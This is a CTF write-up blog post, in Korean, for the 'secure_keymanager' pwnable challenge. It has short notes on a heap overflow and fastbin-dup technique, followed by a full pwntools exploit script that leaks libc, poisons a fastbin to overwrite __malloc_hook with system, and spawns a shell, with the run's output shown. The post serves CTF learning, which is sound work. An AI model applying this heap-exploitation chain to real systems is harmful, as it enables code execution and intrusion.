Category : pwnable
|
secure_keymanager-f9d02e8a1149ff866cad10f001e8f23803bcac3c42ed7ffdcbe50da40e8afd12.zip
Summary : simple heap overflow, fastbin dup into stack
그냥 fastbin문제. 헬게이트 문제로 기억했는데 다른거였나봄.. 하지만 이상한 삽질하다가 시간 더 걸린거 반성하기.
malloc_hook에서 원가젯 바로 못 쓰면 다른 hook 연동해서 간단하게 rsp 컨트롤하기.
malloc 인자 뭐들어가는지 제대로 기억하기.
ex.py
#!/usr/bin/python
from pwn import *
def cmd_add(key_len, title, key):
ru('>> ')
ss('1')
ru('Input key length...')
ss(str(key_len))
ru('Input title...')
ss(title)
ru('Input key...')
if key_len >= 0:
ss(key)
def cmd_edit(idx, new_key, _account=None, _master=None):
ru('>> ')
ss('3')
ru('EDIT KEY\n')
ru('Input Account Name >> ')
if _account:
ss(_account)
ru('Account \'')
name = ru('\'')
rl()
return name
else:
ss(account)
ru('Input Master Pass >> ')
ss(master)
ru('Input id to edit...')
ss(str(idx))
ru('Input new key...')
ss(new_key)
def cmd_remove(idx, _account=None, _master=None):
ru('>> ')
ss('4')
ru('REMOVE KEY\n')
ru('Input Account Name >> ')
if _account:
ss(_account)
ru('Account \'')
name = ru('\'')
rl()
return name
else:
ss(account)
ru('Input Master Pass >> ')
ss(master)
ru('Input id to remove...')
ss(str(idx))
account = 'pwn3r'
master = '/bin/sh'
s = process('./secure_keymanager')
ru = s.recvuntil
rl = s.recvline
sl = s.sendline
ss = s.send
ss(account+'\x00')
ss(master+'\x00')
cmd_add(-16, 'chunk1', '')
cmd_add(16, 'chunk2', 'data')
cmd_add(0x68 - 32, 'chunk3', 'data')
libc_base = u64(cmd_edit(0, '', _account='a'*0x18)[0x18:-1].ljust(8, '\x00')) - 0x7a81b
libc_malloc_hook = libc_base + 0x3c4b10
libc_system = libc_base + 0x45390
master_addr = 0x602130 # "/bin/sh\x00"
print hex(libc_base)
cmd_remove(0) # free chunk1
cmd_remove(2) # free chunk3
cmd_add(-16, 'a'*0x18+p64(0xb1)[:-1], '') # overwrite chunk2 size
cmd_edit(1, 'a'*0x10+p64(0)+p64(0x71)+p64(libc_malloc_hook - 0x23)) # overwrite chunk3 fd
cmd_add(0x68 - 32, 'chunk3 again', 'data') # chunk3 again
payload = 'a'*(0x23-0x10) + p64(libc_system)
cmd_add(0x68 - 32, payload, '\x00') # *libc_malloc_hook = libc_system
ru('>> ')
ss('1')
ru('Input key length...')
ss(str(master_addr - 32))
s.interactive()
s.close()
Exploit
$ python ex.py
[+] Starting local process './secure_keymanager': pid 25650
0x7febf6a9d000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)
'CTF > 2018' 카테고리의 다른 글
| Tokyo Western CTF 2018 - load (0) | 2018.09.03 |
|---|---|
| WhiteHat GrandPrix 2018 QUAL - pwn03 (onehit) (0) | 2018.08.24 |
| WhiteHat GrandPrix 2018 QUAL - pwn02 (BookStore) (0) | 2018.08.20 |
| WhiteHat GrandPrix 2018 QUAL - pwn01 (giftshop) (0) | 2018.08.19 |
| WhiteHat GrandPrix 2018 QUAL - web03 (0) | 2018.08.19 |
